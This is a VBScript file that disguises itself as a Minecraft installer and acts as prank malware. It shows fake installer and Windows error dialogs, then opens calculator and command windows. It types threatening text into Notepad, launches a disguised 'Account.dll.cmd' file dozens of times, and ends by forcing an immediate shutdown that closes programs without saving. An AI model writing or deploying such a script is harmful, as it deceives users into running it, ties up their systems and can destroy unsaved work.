x=msgbox("You going to install Minecraft. Press ok to continue" ,32+0, "Minecraft installer")

x=msgbox("An error occured" ,16+2, "Minecraft installer")

x=msgbox("Minecraft was installed" ,32+0, "Minecraft installer")

x=msgbox("Fatal failure in C:\Windows\system32!" ,16+0, "Microsoft Windows")

CreateObject("wscript.shell").run "Account.dll.cmd"

CreateObject("wscript.shell").run "calc.exe"

CreateObject("wscript.shell").run "calc.exe"

CreateObject("wscript.shell").run "calc.exe"

CreateObject("wscript.shell").run "calc.exe"

CreateObject("wscript.shell").run "calc.exe"

CreateObject("wscript.shell").run "cmd.exe"

x=msgbox("Something happend" ,0, "Oh No")

Set wshshell = wscript.CreateObject("WScript.Shell") 
Wshshell.run "Notepad" 
wscript.sleep 100
wshshell.sendkeys "Y"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "C"
wscript.sleep 100
wshshell.sendkeys "o"
wscript.sleep 100
wshshell.sendkeys "m"
wscript.sleep 100
wshshell.sendkeys "p"
wscript.sleep 100
wshshell.sendkeys "u"
wscript.sleep 100
wshshell.sendkeys "t"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "r "
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "K"
wscript.sleep 100
wshshell.sendkeys "h"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "r"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "b"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "h"
wscript.sleep 100
wshshell.sendkeys "o"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "C"
wscript.sleep 100
wshshell.sendkeys "h"
wscript.sleep 100
wshshell.sendkeys "u"
wscript.sleep 100
wshshell.sendkeys "k"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "H"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "i"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "your pc is now dead enjoy"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "fherkjhfuio"
wscript.sleep 100
wshshell.sendkeys "ghuiek"
wscript.sleep 100
wshshell.sendkeys "yt"
wscript.sleep 100
wshshell.sendkeys "iii"
wscript.sleep 100
wshshell.sendkeys "hfuigre"
wscript.sleep 100
wshshell.sendkeys "ori"
wscript.sleep 100
wshshell.sendkeys "ye"
wscript.sleep 100
wshshell.sendkeys "yy"
wscript.sleep 100
wshshell.sendkeys "ľ"
wscript.sleep 100
wshshell.sendkeys "="
wscript.sleep 100
wshshell.sendkeys "ä"
wscript.sleep 100
wshshell.sendkeys "jguioer"
wscript.sleep 100
wshshell.sendkeys "hguei"
wscript.sleep 100
wshshell.sendkeys "bcvhjedguy"
wscript.sleep 100
wshshell.sendkeys "jfgiolerjholifjroiejfoierioghroidhgoihuihsuighdskghvuirtdhvukrhshlugsriio"

x=msgbox("DEAD" ,48+0, "jgkehjkvhehviuhdui")


wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"


CreateObject("wscript.shell").run "Account.dll.cmd"

CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"
CreateObject("wscript.shell").run "Account.dll.cmd"

wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 100
wshshell.sendkeys "d"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"
wscript.sleep 100
wshshell.sendkeys "5"
wscript.sleep 100
wshshell.sendkeys "z"
wscript.sleep 100
wshshell.sendkeys "jh"
wscript.sleep 100
wshshell.sendkeys "hfeio"
wscript.sleep 100
wshshell.sendkeys "juty"
wscript.sleep 100
wshshell.sendkeys "jky"
wscript.sleep 100
wshshell.sendkeys "ehr"
wscript.sleep 100
wshshell.sendkeys "dgr"
wscript.sleep 100
wshshell.sendkeys "486fds"
wscript.sleep 100
wshshell.sendkeys "87"

x=msgbox("DIIIIIIIIIIIEEEEEEEEEEEEEEE!!!!!!!!!!" ,0, "DIE!!!")

' -s = shutdown, -t 0 = no timeout, -f = force programs to close 
strShutdown = "shutdown.exe -s -t 0 -f -m \\" & strComputer 
set objShell = CreateObject("WScript.Shell") 
objShell.Run strShutdown, 60, false